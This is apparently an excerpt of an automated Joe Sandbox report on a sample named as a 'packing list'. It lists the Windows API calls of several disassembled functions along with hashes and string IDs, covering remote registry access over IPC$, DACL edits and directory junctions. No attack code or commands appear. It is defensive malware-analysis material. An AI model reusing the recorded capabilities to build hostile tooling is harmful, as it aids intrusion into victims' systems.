                                                  • Opcode Fuzzy Hash: 0d7a63cc22723f3199e4b314f45c79d4e733af08c2d4763be1d28f2d1fb2dc00
                                                  • Instruction Fuzzy Hash: AB619E71500215BBEF24DF64CC86BAA7BE8FB18715F1042A5F925D61D1EBB4E980CB60
                                                  APIs
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • CharLowerBuffW.USER32(?,?), ref: 00B7D292
                                                  • GetDriveTypeW.KERNEL32 ref: 00B7D2DF
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7D327
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7D35E
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7D38C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 1148790751-4113822522
                                                  • Opcode ID: 8a421e128334b70ae3f4eb0de6a98e6e4e1be25f1eb807309309f4c186b538d7
                                                  • Instruction ID: 8be63afbac1b9ed61d9c976c6aa1989252711231c9df6f1d1fa6ed0899642f49
                                                  • Opcode Fuzzy Hash: 8a421e128334b70ae3f4eb0de6a98e6e4e1be25f1eb807309309f4c186b538d7
                                                  • Instruction Fuzzy Hash: EF513A71504605AFC700EF15C88196EB7F4FF98758F1089ADF89A67261DB31EE06CB52
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00BA3973,00000016,0000138C,00000016,?,00000016,00BCDDB4,00000000,?), ref: 00B726F1
                                                  • LoadStringW.USER32(00000000,?,00BA3973,00000016), ref: 00B726FA
                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00BA3973,00000016,0000138C,00000016,?,00000016,00BCDDB4,00000000,?,00000016), ref: 00B7271C
                                                  • LoadStringW.USER32(00000000,?,00BA3973,00000016), ref: 00B7271F
                                                  • __swprintf.LIBCMT ref: 00B7276F
                                                  • __swprintf.LIBCMT ref: 00B72780
                                                  • _wprintf.LIBCMT ref: 00B72829
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B72840
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 618562835-2268648507
                                                  • Opcode ID: a96895e501cf1fee2e7f4f2f5b744dcfa6d54958a7a0944578f704b0d303b49a
                                                  • Instruction ID: b0f92169e48a74e2c56bdb5601753e8f27b7ba52ed4f8d8028cd75ad4cbd1fa4
                                                  • Opcode Fuzzy Hash: a96895e501cf1fee2e7f4f2f5b744dcfa6d54958a7a0944578f704b0d303b49a
                                                  • Instruction Fuzzy Hash: 39410C72800219ABCB14EBE0DD86EEEB7F8AF14740F2040A5B50677092EB756F49CB61
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B7D0D8
                                                  • __swprintf.LIBCMT ref: 00B7D0FA
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B7D137
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B7D15C
                                                  • _memset.LIBCMT ref: 00B7D17B
                                                  • _wcsncpy.LIBCMT ref: 00B7D1B7
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B7D1EC
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B7D1F7
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00B7D200
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B7D20A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: f43d6ba5b30e92a3a8470cf351f7732aee6e90defcea70bff1892b2b393ec286
                                                  • Instruction ID: 50b16df6a140f64afdd4a6b43fdc39a8f2d41c912bd5f4f9877a8a6625701702
                                                  • Opcode Fuzzy Hash: f43d6ba5b30e92a3a8470cf351f7732aee6e90defcea70bff1892b2b393ec286
                                                  • Instruction Fuzzy Hash: 9931AEB650010AABDB20DFA4CC49FAB77FCEF89741F1081F6F919E2161EB7496458B24
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B9BEF4,?,?), ref: 00B9E754
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E76B
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E776
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E783
                                                  • GlobalLock.KERNEL32(00000000), ref: 00B9E78C
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E79B
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B9E7A4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E7AB
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B9BEF4,?,?,00000000,?), ref: 00B9E7BC
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BBD9BC,?), ref: 00B9E7D5
                                                  • GlobalFree.KERNEL32(00000000), ref: 00B9E7E5
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9E809
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B9E834
                                                  • DeleteObject.GDI32(00000000), ref: 00B9E85C
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B9E872
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 567a36ae47f58caf98d8fb16d46caf6603cf2d144ac87ff8491e7991ccd5bdd6
                                                  • Instruction ID: 3151121923871f4025ce951d5a02dcac59971105cbdca16b93ea44cdb9c00a59
                                                  • Opcode Fuzzy Hash: 567a36ae47f58caf98d8fb16d46caf6603cf2d144ac87ff8491e7991ccd5bdd6
                                                  • Instruction Fuzzy Hash: 7F414B75500204FFDB11DFA5DC88EAE7BB8EB89B11F104168F915A7260EBB4DD40CB21
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00B8076F
                                                  • _wcscat.LIBCMT ref: 00B80787
                                                  • _wcscat.LIBCMT ref: 00B80799
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B807AE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B807C2
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00B807DA
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B807F4
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80806
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 90eb599b50d2e2baebe51d53f0364d8453b5755c7e9d68eb6aaf24ce6837c1eb
                                                  • Instruction ID: 8797bd357c86dbaedcd3a203316ccbd5096e50d4334a1a3e9e76029efb3d066a
                                                  • Opcode Fuzzy Hash: 90eb599b50d2e2baebe51d53f0364d8453b5755c7e9d68eb6aaf24ce6837c1eb
                                                  • Instruction Fuzzy Hash: 5B8181715143419FCBA4FF64C88596AB3E8EB98380F1488AEF885D7261EB34D948CB52
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B9EF3B
                                                  • GetFocus.USER32 ref: 00B9EF4B
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00B9EF56
                                                  • _memset.LIBCMT ref: 00B9F081
                                                  • GetMenuItemInfoW.USER32 ref: 00B9F0AC
                                                  • GetMenuItemCount.USER32(00000000), ref: 00B9F0CC
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B9F0DF
                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B9F113
                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B9F15B
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B9F193
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B9F1C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: b97798bd2c5b10db97ce36a994ac5ef1f4159f077443b117e8284e02e2b4427a
                                                  • Instruction ID: 6e84d36060fa94627393a69fa77d7e9661c172f3d3f5d904504638eee4f69240
                                                  • Opcode Fuzzy Hash: b97798bd2c5b10db97ce36a994ac5ef1f4159f077443b117e8284e02e2b4427a
                                                  • Instruction Fuzzy Hash: D4815B71504312AFDB20CF15D884A7ABBE9FB88324F1049BEF995E7291D770D905CBA2
                                                  APIs
                                                    • Part of subcall function 00B6ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B6ABD7
                                                    • Part of subcall function 00B6ABBB: GetLastError.KERNEL32(?,00B6A69F,?,?,?), ref: 00B6ABE1
                                                    • Part of subcall function 00B6ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B6A69F,?,?,?), ref: 00B6ABF0
                                                    • Part of subcall function 00B6ABBB: HeapAlloc.KERNEL32(00000000,?,00B6A69F,?,?,?), ref: 00B6ABF7
                                                    • Part of subcall function 00B6ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B6AC0E
                                                    • Part of subcall function 00B6AC56: GetProcessHeap.KERNEL32(00000008,00B6A6B5,00000000,00000000,?,00B6A6B5,?), ref: 00B6AC62
                                                    • Part of subcall function 00B6AC56: HeapAlloc.KERNEL32(00000000,?,00B6A6B5,?), ref: 00B6AC69
                                                    • Part of subcall function 00B6AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B6A6B5,?), ref: 00B6AC7A
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B6A8CB
                                                  • _memset.LIBCMT ref: 00B6A8E0
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B6A8FF
                                                  • GetLengthSid.ADVAPI32(?), ref: 00B6A910
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B6A94D
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B6A969
                                                  • GetLengthSid.ADVAPI32(?), ref: 00B6A986
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B6A995
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B6A99C
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B6A9BD
                                                  • CopySid.ADVAPI32(00000000), ref: 00B6A9C4
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B6A9F5
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B6AA1B
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B6AA2F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 9fce84f23a0d7c313ca1e6322880cac40a051dd7e75e36361e4a0713c3966ac3
                                                  • Instruction ID: aa7915bc5085442dff9ab25ce3f126d679be4db595de638aacd34d888f0f6714
                                                  • Opcode Fuzzy Hash: 9fce84f23a0d7c313ca1e6322880cac40a051dd7e75e36361e4a0713c3966ac3
                                                  • Instruction Fuzzy Hash: 97514D71900109AFDF10DF94DD95AEEBBB9FF04300F14826AE911E7291DB799905CF61
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00B89E36
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B89E42
                                                  • CreateCompatibleDC.GDI32(?), ref: 00B89E4E
                                                  • SelectObject.GDI32(00000000,?), ref: 00B89E5B
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B89EAF
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B89EEB
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B89F0F
                                                  • SelectObject.GDI32(00000006,?), ref: 00B89F17
                                                  • DeleteObject.GDI32(?), ref: 00B89F20
                                                  • DeleteDC.GDI32(00000006), ref: 00B89F27
                                                  • ReleaseDC.USER32(00000000,?), ref: 00B89F32
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 3aa0715bf670ab22c69b52cb8d123c069e56552174a157077612b1cfdd9a7146
                                                  • Instruction ID: 4f6ea6c8274283c6806c33072912dd5be61a73f9764f1b7d84d35d488b789b53
                                                  • Opcode Fuzzy Hash: 3aa0715bf670ab22c69b52cb8d123c069e56552174a157077612b1cfdd9a7146
                                                  • Instruction Fuzzy Hash: 43514975900309EFCB14DFA8C885EAEBBF9EF48310F14895DF95AA7220D775A941CB50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 2889450990-2391861430
                                                  • Opcode ID: bbf7fb2a5951a92102f7268ae066b29c7c25fd91d9cfd2e2bb71eb29ece4e514
                                                  • Instruction ID: ee3ebee81748e5f15eaa5249fffaeeb896674318db6c3420f2393c122feb28f4
                                                  • Opcode Fuzzy Hash: bbf7fb2a5951a92102f7268ae066b29c7c25fd91d9cfd2e2bb71eb29ece4e514
                                                  • Instruction Fuzzy Hash: 21514A71800509AACB15EBE4CD46EEEBBF8EF08300F2045E9B515730A2EB316F59DB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 2889450990-3420473620
                                                  • Opcode ID: 4020d88a9561e66d75df302eac467989a30ccfeaacb1ffe7b55f69891f335d1a
                                                  • Instruction ID: 338ee3a7506927cee85d384c12f5be6b3c06c82667b613b172b6998a632327f3
                                                  • Opcode Fuzzy Hash: 4020d88a9561e66d75df302eac467989a30ccfeaacb1ffe7b55f69891f335d1a
                                                  • Instruction Fuzzy Hash: F1517D31800509AACB15EBE4DD46EEEBBF8EF04300F2041A9B519731A2EB756F59DB61
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B755D7
                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00B75664
                                                  • GetMenuItemCount.USER32(00BF1708), ref: 00B756ED
                                                  • DeleteMenu.USER32(00BF1708,00000005,00000000,000000F5,?,?), ref: 00B7577D
                                                  • DeleteMenu.USER32(00BF1708,00000004,00000000), ref: 00B75785
                                                  • DeleteMenu.USER32(00BF1708,00000006,00000000), ref: 00B7578D
                                                  • DeleteMenu.USER32(00BF1708,00000003,00000000), ref: 00B75795
                                                  • GetMenuItemCount.USER32(00BF1708), ref: 00B7579D
                                                  • SetMenuItemInfoW.USER32(00BF1708,00000004,00000000,00000030), ref: 00B757D3
                                                  • GetCursorPos.USER32(?), ref: 00B757DD
                                                  • SetForegroundWindow.USER32(00000000), ref: 00B757E6
                                                  • TrackPopupMenuEx.USER32(00BF1708,00000000,?,00000000,00000000,00000000), ref: 00B757F9
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B75805
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 3993528054-0
                                                  • Opcode ID: e66b3259126272ecba1c4b8252fcd8f7224ac020043c54ba5143b84a7c3f0e6b
                                                  • Instruction ID: c7cbf0be01c93b7bf9feaeff9a4fdea01fd4c31a6d67fb3f5d871f70911423eb
                                                  • Opcode Fuzzy Hash: e66b3259126272ecba1c4b8252fcd8f7224ac020043c54ba5143b84a7c3f0e6b
                                                  • Instruction Fuzzy Hash: FB71C370640605BBEB349B54CC89FAABFA5FF00364F248259F52D6A1E1CBF1AC10DB94
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B6A1DC
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B6A211
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B6A22D
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B6A249
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B6A273
                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B6A29B
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B6A2A6
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B6A2AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 1687751970-22481851
                                                  • Opcode ID: 1a3861ae12d71bd6b759bacfe4d66e888124a2d9ef726fc5d78d48b996c10955
                                                  • Instruction ID: 323c91f31cc2239664d8a1f077e81237d7c115b919e50c23ca40314261af5245
                                                  • Opcode Fuzzy Hash: 1a3861ae12d71bd6b759bacfe4d66e888124a2d9ef726fc5d78d48b996c10955
                                                  • Instruction Fuzzy Hash: C741C276810629ABDF21EBA4DC959EEB7B8FF18700F5041A9E901B3161EB74AE05CF50
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B92BB5,?,?), ref: 00B93C1D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
